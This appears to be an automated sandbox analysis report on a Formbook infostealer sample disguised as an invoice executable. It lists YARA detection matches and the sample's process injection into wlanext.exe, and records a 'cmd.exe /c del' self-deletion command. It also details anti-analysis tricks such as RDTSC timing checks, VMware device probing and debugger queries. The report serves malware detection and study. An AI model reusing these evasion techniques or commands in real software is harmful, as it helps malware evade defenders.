          Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@16/7
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_01
          Source: C:\Users\user\Desktop\INV74321.exeFile created: C:\Users\user\AppData\Local\Temp\nso60E4.tmpJump to behavior
          Source: INV74321.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\INV74321.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\INV74321.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: INV74321.exeVirustotal: Detection: 30%
          Source: INV74321.exeMetadefender: Detection: 14%
          Source: INV74321.exeReversingLabs: Detection: 72%
          Source: C:\Users\user\Desktop\INV74321.exeFile read: C:\Users\user\Desktop\INV74321.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\INV74321.exe 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Users\user\Desktop\INV74321.exeProcess created: C:\Users\user\Desktop\INV74321.exe 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\INV74321.exeProcess created: C:\Users\user\Desktop\INV74321.exe 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Users\user\Desktop\INV74321.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: INV74321.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000005.00000000.244743152.000000000F686000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: INV74321.exe, 00000000.00000003.214730841.0000000002B90000.00000004.00000001.sdmp, INV74321.exe, 00000001.00000002.257577232.0000000000BCF000.00000040.00000001.sdmp, wlanext.exe, 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INV74321.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: INV74321.exe, 00000001.00000002.257445495.0000000000A50000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000005.00000000.244743152.000000000F686000.00000004.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: INV74321.exe, 00000001.00000002.257445495.0000000000A50000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\INV74321.exeUnpacked PE file: 1.2.INV74321.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0040102D pushfd ; ret
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004160CD push 00000033h; iretd
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004161E9 push es; retf
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041624E push es; retf
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00418F45 push es; ret
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041CFEE push dword ptr [C5AA8973h]; retn EADCh
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B2D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_0040102D pushfd ; ret
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004160CD push 00000033h; iretd
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004161E9 push es; retf
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_0041624E push es; retf
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_0041B40B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0379D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030CC381 pushad ; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030CB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C624E push es; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C61E9 push es; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C60CD push 00000033h; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C8F45 push es; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030CB40B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030CB402 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030CB46C push eax; ret
          Source: C:\Users\user\Desktop\INV74321.exeFile created: C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dllJump to dropped file
          Source: C:\Users\user\Desktop\INV74321.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\INV74321.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\INV74321.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000030B85E4 second address: 00000000030B85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000030B897E second address: 00000000030B8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\INV74321.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 5468Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 6748Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_004027A1 FindFirstFileA,
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.231378455.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.231773140.0000000004E61000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000005.00000000.237685371.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.237953316.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.233054387.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.239170353.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000002.484763017.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000005.00000000.237685371.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.237685371.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.242904889.00000000089C5000.00000004.00000001.sdmpBinary or memory string: qeMusic
          Source: explorer.exe, 00000005.00000000.237685371.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\INV74321.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\INV74321.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_10001000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_023F17F3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_023F15DB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B92073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
